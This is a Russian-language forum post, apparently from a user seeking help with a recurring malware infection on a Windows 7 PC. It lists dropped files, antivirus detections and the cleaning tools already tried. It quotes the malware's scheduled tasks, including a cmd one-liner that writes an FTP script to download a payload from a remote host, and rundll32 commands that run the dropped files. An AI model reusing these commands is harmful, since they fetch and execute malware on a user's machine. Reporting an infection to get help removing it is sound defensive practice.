Добрый день!
Прошу помощи в лечении компьютера. Суть проблемы: периодически происходят попытки загрузки вирусных файлов с различных адресов. Обычно каждые 3 часа. Впервые проблема была замечена еще в мае, но тогда все успешно пофиксилось при помощи Trojan remover. Спустя 2 месяца угроза вновь появилась.
Примеры мест загрузки:
C:\Windows\debug\lsmose.exe
C:\Windows\debug\item.dat
Попытки заражения:
C:\Windows\system32\wbem\scrcons.exe (Заражение: Win32:Rootkit-gen [Rtk])
C:\Windows\system32\lsass.exe (Заражение: URL:Mal)
Были и другие места, но к сожалению старых отчетов не осталось.
В запланированных задачах регулярно появляются такие записи:
Mysa1 -- rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
Mysa2 -- cmd /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
Ок -- rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa
Чистка с помощью Malwarebytes помогает только на день (обнаруживает Trojan.Agent.Generic), потом записи появляются снова. Также были использованы: Avast, Trojan remover, Cureit, AdwCleaner. Все безуспешно.
Система Windows 7 (64 bit). Антивирус Avast Free.